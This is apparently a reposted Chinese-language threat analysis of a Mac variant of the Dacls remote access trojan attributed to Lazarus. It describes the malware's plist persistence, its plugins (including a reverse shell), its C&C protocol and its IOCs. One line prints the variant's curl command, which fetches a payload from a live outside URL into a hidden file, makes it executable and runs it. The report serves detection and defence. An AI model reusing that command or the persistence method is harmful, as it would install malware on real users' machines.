发现
4月8日,来自香港的可疑Mac应用程序“ TinkaOTP”已提交给VirusTotal。当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“ Contents / Resources / Base.lproj /”目录中,并且它是Mac可执行文件,并且装作nib文件(“ SubMenu.nib”)。它包含字符串“ c_2910.cls”和“ k_3872.cls”,它们是以前观察到的证书和私钥文件的名称。坚持不懈
该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,该文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。 当恶意应用程序启动时,它将在“ Library / LaunchDaemons”目录下创建一个名称为“ com.aex-loop.agent.plist”的plist文件。plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“ getpwuid(getuid())”是否返回当前进程的用户标识。如果返回用户ID,它将在LaunchAgents目录:“ Library / LaunchAgents /”下创建plist文件“ com.aex-loop.agent.plist”。

配置文件
配置文件包含有关受害者计算机的信息,例如Puid,Pwuid,插件和C&C服务器。配置文件的内容使用AES加密算法加密。




主循环
初始化配置文件后,执行主循环以执行以下四个主命令:- 将C&C服务器信息从配置文件上载到服务器(0x601)
- 从服务器下载配置文件内容并更新配置文件(0x602)
- 通过调用“ getbasicinfo”功能(0x700)从受害者的计算机上载收集的信息
- 发送心跳信息(0x900)

外挂程式
此Mac RAT具有Linux变体中看到的所有六个插件,以及一个名为“ SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,该部分将在插件初始化时加载。
CMD插件
cmd插件类似于Linux rat中的“ bash”插件,该插件通过为C&C服务器提供反向外壳来接收和执行命令。
文件插件
文件插件具有读取,删除,下载和搜索目录中文件的功能。Mac和Linux版本之间的唯一区别是Mac版本不具有写入文件的能力(情况0)。
流程插件
进程插件具有终止,运行,获取进程ID和收集进程信息的功能。
- 通过执行“ / proc /%/ cmdline”的过程的命令行参数
- “ / proc /%d / status”文件中进程的名称,Uid,Gid,PPid。
测试插件
Mac和Linux变体之间的Test插件的代码是相同的。它检查与C&C服务器指定的IP和端口的连接。RP2P插件
RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。
LogSend插件
Logsend插件包含三个模块,这些模块:- 检查与日志服务器的连接
- 扫描网络(蠕虫扫描仪模块)
- 执行长期运行的系统命令



Socks插件
Socks插件是此Mac Rat中新增的第七个插件。它类似于RP2P插件,并充当媒介来指导bot和C&C基础结构之间的流量。它使用Socks4进行代理通信。
网络通讯
此Mac RAT使用的C&C通信类似于Linux变体。为了连接到服务器,应用程序首先建立TLS连接,然后执行信标设置,最后使用RC4算法对通过SSL发送的数据进行加密。




变体和检测
我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载: curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001> / dev / null 2>&1 && chmod + x〜/ Library / .mina> / dev / null 2>&1 &&〜/ Library / .mina> / dev 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪活动的臭名昭著的朝鲜威胁演员。 该组织是最复杂的参与者之一,能够制作自定义恶意软件以针对不同平台。此Mac RAT的发现表明该APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。

IOCS
899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords [。] com / wp-content / uploads / 2020/01 / images.tgz.001
67.43.239.146 185.62.58.207 50.87.144.227
未经允许不得转载:x-sec » 朝鲜黑客发布针对中国用户的Dacls RAT的Mac变种